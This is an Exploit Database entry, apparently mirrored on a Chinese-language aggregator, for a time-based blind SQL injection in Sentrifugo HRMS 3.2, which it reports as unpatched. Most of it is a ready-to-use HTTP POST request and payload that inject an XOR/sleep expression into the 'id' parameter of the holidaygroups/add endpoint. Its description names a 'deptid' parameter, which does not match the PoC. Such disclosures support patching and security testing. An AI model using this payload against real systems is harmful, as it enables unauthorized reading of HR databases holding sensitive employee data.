Sentrifugo HRMS 3.2 – ‘id’ SQL Injection

• Exploit Database
• 49 阅读

• 作者： minhnb
  日期： 2020-03-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48179/

• # Exploit Title: Sentrifugo HRMS 3.2 - 'id' SQL Injection
  # Exploit Author: minhnb
  # Website: 
  # Date: 2020-03-06
  # Google Dork: N/A
  # Vendor: http://www.sapplica.com
  # Software Link: http://www.sentrifugo.com/download
  # Affected Version: 3.2 and possibly before
  # Patched Version: unpatched
  # Category: Web Application
  # Platform: PHP
  # Tested on: Win10x64 & Kali Linux
  # CVE: N/A
   
  # 1. Technical Description:
  # Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
  # parameter through POST request in "/sentrifugo/index.php/holidaygroups/add" resource.
  # This allows a user of the application without permissions to read sensitive information from
  # the database used by the application.
  
  # 2. Proof Of Concept (PoC):
  
  POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Referer: http://localhost/sentrifugo/index.php
  Connection: keep-alive
  Cookie: PHPSESSID=j4a2o4mq6frhfltq2a0h2spknh
  Accept: */*
  Accept-Encoding: gzip,deflate
  Content-Length: 98
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
  
  Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save
  
  
  # 3. Payload:
  
  Parameter: id (POST)
  Type: time-based blind
  Title: MySQL >= 5.0 time-based blind - Parameter replace
  Payload: Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z&submit=Save
  
  # 4. Reference: